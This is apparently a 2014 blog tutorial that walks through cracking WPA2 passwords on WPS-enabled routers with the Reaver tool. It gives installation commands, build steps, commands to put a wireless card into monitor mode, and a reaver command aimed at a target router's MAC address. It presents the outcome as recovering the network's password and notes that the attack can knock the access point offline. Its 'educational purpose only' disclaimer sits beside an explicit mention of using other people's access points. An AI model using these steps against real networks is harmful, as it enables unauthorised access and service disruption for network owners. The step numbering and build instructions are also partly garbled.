Saturday 20 December 2014

WPA2 password hacking How to Crack WPA2 password 802.11 Wifi

Note: Method works only with WPA routers which have WPS support. Most routers sold since   2008 and later are WPS enabled.
         This tutorial for educational purpose only. i am not encouraging anyone to hack into other AP & make them paying high for the internet Bill

Downloads & setup:

    I used  Ubuntu but you can use any linux distro. Root access is must.
    libpcap:- Traffic capture library
    Reaver :-  Hacking tool. Download Reaver-1.4
    Iwscanner:- Wifi scanning Tool. Download link-  Iwscanner 0.24[Ubuntu]  Iwscanner-0.2.4 [Linux generic]

Step 1. Install Libpcap & Its dependencies:

    sudo apt-get update

    sudo apt-get install build-essential

    sudo apt-get install flex bison

    sudo apt-get install libpcap-dev

    sudo apt-get install libpcap3-dev

    sudo apt-get install libsqlite3-dev

    sudo apt-get install libnl2-dev

Step 2. How to Compile/Build Reaver:

Make sure you’ve build-essential, then run following commands (assuming reaver is extracted to desktop):

    cd ~/Desktop/reaver-1.4/src



    sudo make install

Step 3. Identify MAC address of the target router.

You can use any Wifi Scanner like iwScanner  to note the MAC address of the target Wifi SSID.

Step 4. Putting your Wireless card to monitor mode.

Run these commands on terminal:

    sudo ifconfig wlan0 down

    sudo iwconfig wlan0 mode monitor

    sudo ifconfig wlan0 up

Step 5. Starting the attack:

Reaver only requires two inputs to launch an attack: the interface to use to launch them, and the MAC address of the target:

    sudo  reaver -i wlan0 -b 00:11:22:33:44:55  [replace this with target MAC Address ]

Wait for few Our (Yes, patiance is the key)

Step 4. When the attack finishes, it will give you the SSID and authentication password for the target network.

During the attack the target AP can  stop responding & caused a denial of service  DoS attack.

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